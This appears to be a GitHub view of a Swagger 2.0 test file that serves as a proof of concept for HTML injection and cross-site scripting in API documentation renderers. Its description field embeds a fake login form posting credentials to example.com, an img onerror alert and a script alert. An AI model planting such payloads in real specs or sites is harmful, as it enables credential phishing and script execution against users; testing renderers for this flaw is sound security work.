-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathtest.yaml
34 lines (34 loc) · 1.06 KB
/
test.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
swagger: '2.0'
info:
version: 1.0.0
title: Fake Login Page
description: '
<div class="login-form">
<div class="heading">
<h1>HTML Injection : Fake Login</h1>
</div>
<div class="form-container">
<form action="https://example.com/login" method="post" class="form-signin">
<div class="form-group">
<label for="username">Username</label>
<input type="text" name="username" size="20">
</div>
<div class="form-group">
<label for="password">Password</label>
<input type="password" name="password" size="20">
</div>
<div class="form-group">
<button type="submit" class="btn btn-default">Login</button>
</div>
</form>
</div>
</div>
<img src=https://blog.ipleaders.in/wp-content/uploads/2020/02/Ways-Websites-Are-Hacked-How-to-Prevent-Them-1.png onerror=alert(document.domain)>
<script>alert(1)</script>
'
paths:
/:
post:
responses:
'200':
description: Login successful